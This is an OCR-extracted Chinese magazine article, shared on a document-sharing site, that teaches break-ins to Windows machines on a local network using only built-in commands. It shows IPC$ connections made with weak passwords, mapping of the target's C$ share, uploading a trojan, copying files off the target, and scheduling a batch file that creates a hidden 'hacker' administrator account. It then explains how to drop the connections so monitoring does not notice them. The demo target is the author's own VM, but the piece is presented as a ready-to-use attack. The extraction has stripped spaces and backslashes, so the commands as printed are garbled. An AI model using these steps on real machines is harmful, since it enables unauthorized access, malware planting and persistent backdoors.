秒不用软件入侵别人电脑.pdf

秒不用软件入侵别人电脑.pdf

《秒不用软件入侵别人电脑.pdf》由会员分享，可在线阅读，更多相关《秒不用软件入侵别人电脑.pdf（3页珍藏版）》请在冰豆网上搜索。

4520100745000707栏目编辑：

张薇网管与维护入侵前的“热身”踩点情况介绍：

某个局域网（网吧、学校、公司等均可），这种环境下仍有相当一部分的计算机是超级用户Administrator与空口令的“黄金搭档”（或是一些像“123456”之类的弱口令），其罪魁祸首有可能是不负责任的网管为图省事，用一个Ghost镜像文件还原的，也有可能是用户自己的防范意识不到位。

笔者是在自己的机子上用VMWare6.0.2搭建了一台WindowsServer2003StandardEdition虚拟机来作为入侵攻击的目标主机，其IP为10.10.10.2，超级用户Administrator使用弱口令“123456”；自己的主机安装的是WindowsXPProfessional，IP为10.10.10.1，为攻方。

开始入侵的过程：

1从WindowsXP环境下进入CMD窗口先单击“开始”“运行”，然后在“打开”中输入“CMD”（大小写均可，不包括两侧引号）后单击“确定”按钮（如图1），这样系统就会调用System32目录中的CMD.exe命令进入命令行窗口。

2建立IPC$连接IPC$是“InternetProcessConnection”的简写，意思是“共享命名管道”，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

输入“netuse10.10.10.2ipc$“123456”/user:

”administrator”后回车，CMD会提示“命令成功完成”（如图2）。

其中的“10.10.10.2”为目标主机的IP，“123456”是密码，“/user:

”administrator”是登录用户，这样我们就与目标建立好了连接通道。

3进行磁盘分区映射在CMD中输入“netusex:

10.10.10.2c$”后回车（如图3），意思是将自己机子上未使用的X盘与目标的C盘进行映射。

注意IP后的C带了“$”，是默认共享，它是Windows2000之后的系统所默认开启的硬盘分区共享。

建立了这种映射之后，在自己机子上的X盘就相当于目标的C盘了，此时可以打开“我的电脑”看一下，是不是多了一个X盘（如图4）？

点击看看其中的内容，都是WindowsServer2003的，其实这时我们就可以进行文件的复制和删除，就像是我们本地硬盘分区一样，不过我们仍可以使用命令来完成相同的操作。

输入“X：

”后回车进入X盘，用“dir/w”列目录命令看一下（如图5），是不是与“我的电脑”中所列内容文/图牟晓东随着各种傻瓜式入侵攻击软件在互联网上泛滥，如今的入侵攻击开始变得越来越简单了：

不需要懂得什么高深的知识原理，也不用四处拜师学艺，只须照着动画教程在工具中用鼠标点点按钮进行一些简单的设置，谈笑间就会使目标网站轰然倒下！

其实很多的傻瓜式操作入侵工具在其图形化便利操作界面的背后，真正起关键作用的都是Windows操作系统自身所提供的正常命令和服务。

在很多情况下，我们其实并不需要任何第三方的入侵工具，单单是在Windows的CMD“黑”命令窗口下就能赤手空拳地进行入侵。

图1图246ComputerKnowledgeandTechnology栏目编辑：

张薇网管与维护一样？

4“上传”复制文件如果你想把自己的木马服务端上传的话，只须一个COPY复制命令就能轻易完成。

假设你的木马服务端程序Horse.exe在自己的D盘的话，此时可以直接在X：

盘符下输入“copyd:

horse.exe”回车，这样你的木马就会上传到目标的C盘下了，再接着用“dir/w”列目录看一下（如图6）。

5“下载”目标的文件下载与刚才的上传正好相反，但使用的命令却是同一个COPY。

输入“copyconfig.sysd:

”后回车，就会把目标上的CONFIG.SYS这个文件复制到了本地D盘中（如图7）。

6添加新超级用户hacker以前曾流传有两条添加用户并提升为超级用户的命令，那就是“netuserhacker654321/add”和“netlocalgroupadministratorshacker/add”。

前者是建立一个名为hacker的普通账号，密码是“654321”；后者是将hacker账号加入到超级用户组中（注意其中的administrators，而不是administrator！

）。

如果你在本地的CMD窗口中依次运行这两条命令的话，虽然能够成功运行，但结果却是在你自己的机子上建立了hacker超级用户。

怎样才能在目标主机上运行呢？

首先是新建一个文本文件将这两条命令依次输入，后面都有回车；然后点击“文件”“另存为”，将“保存类型”由默认的“文本文档”选择为“所有文件”，在“文件名”处输入“AddUser.bat”（如图8），这样就建立好了一个批处理文件，把它保存到D盘图3图4图5图6图7图84720100747000707栏目编辑：

张薇网管与维护中。

在CMD窗口中输入“copyAddUser.bat10.10.10.2admin$system32”并回车，也就是将这个批处理文件复制到目标的系统盘System32文件夹中（这可是系统的核心文件夹）。

接着输入“nettime10.10.10.2”并回车，CMD马上会回显出目标系统的运行时间等信息：

“10.10.10.2的当前时间是2008/3/1上午09：

23”。

最后输入“at10.10.10.209:

25AddUser.bat”并回车，CMD会提示“新加了一项作业，其作业IDX”，意思是目标主机将在9：

25运行刚刚上传的AddUser.bat批处理文件。

（如图9）时间到了之后，在虚拟机上右击“我的电脑”选择“管理”，在弹出的“计算机管理”窗口中找到“本地用户和组”下的“用户”项，打开后看一看，是不是多了一个名为hacker的账号？

双击后看看它的属性：

隶属于administrators超级用户组（如图10）。

7删除硬盘分区映射当文件的上传与下载均完成之后，应该把建立的分区映射及时删除掉，输入“netusex:

/del”后回车即可，此时如果再使用“dirx:

”命令来查看X盘内容的话，CMD会提示“系统找不到指定的路径”（如图11）。

8关闭IPC$连接与删除硬盘分区映射一样，IPC$连接在入侵完毕之后也要及时关闭，因为如果对方对本地机与外界主机的通信进行监视的话，很容易发现这样一条数据传输通道。

输入“netuse10.10.10.2IPC$/del”后回车，我们会得到“10.10.10.2ipc$已经删除”的信息（如图12），撤！

小结：

其实，在CMD命令行窗口下可以运行的命令是远远不止于此的，其它的比较有名的还有开启对方服务的netstart命令、发送消息的netsend命令、删除日志的del命令以及大名鼎鼎的Ping命令（早在Windows98年代就有著名的“死亡之Ping”，可瞬间使对方机器处于瘫痪状态）。

窗口虽然简陋，命令行虽然短小，但最终导致的后果却是一点儿也不容小觑的。

最关键的是，这种入侵不依赖于任何工具，只要掌握了对方的账户和密码，你就可以行云流水般在键盘上轻松完成入侵“高手哇！

”-图9图10图11图12